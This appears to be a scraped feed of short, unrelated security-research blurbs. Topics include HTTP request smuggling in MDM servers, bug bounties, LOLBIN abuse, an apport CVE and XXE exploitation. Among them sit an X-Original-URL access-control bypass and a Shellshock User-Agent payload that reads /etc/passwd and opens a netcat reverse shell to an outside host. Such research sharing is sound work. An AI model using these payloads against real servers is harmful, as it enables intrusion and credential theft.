by Worawit Wangwarunyoo , DATAFARM Research Team, Datafarm Company Limited

TL;DR: This is how I was able to exploit a HTTP Request Smuggling in a Mobile Device Management (MDM) servers and send any MDM command to…

GET /admin HTTP/1.1 Host: https://t.co/kc0BFkaTX3 ... Access is denied GET /test HTTP/1.1 Host: https://t.co/kc0BFkaTX3 X-Original-URL: /admin HTTP/1.1 200 OK

Raspberry Pi - Raspberry Pi Tor Access Point Guide, Tor proxy, Raspberry Pi 2, Raspberry Pi 3, Raspberry Pi 4

How my name was added to humans.txt for scoring my first bug bounty, a severity 2 one at that!

open redirect to a complete account takeover

Burp Extension for easily creating Wordlists. Contribute to GainSec/GoldenNuggets-1 development by creating an account on GitHub.

Understanding “rundll32.exe” command line arguments

This is the third post in a series about Ubuntu’s crash reporting system. We’ll review CVE-2019-15790, a vulnerability in apport that enables a local attacker to obtain the ASLR offsets for any process they can start (or restart).

Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I've been having a blast starting my new role in the MDSec ActiveBreach team.

Today I wanted to share…

Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash

This article provides an easy single-click Frida installation script and walkthrough for Android application pentests.

A theory to practice approach

Background Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

Today, we present the method to exploit XXEs with local a Document Type Declaration (DTD) file. More specifically, how we have built a huge list of reusable DTD files.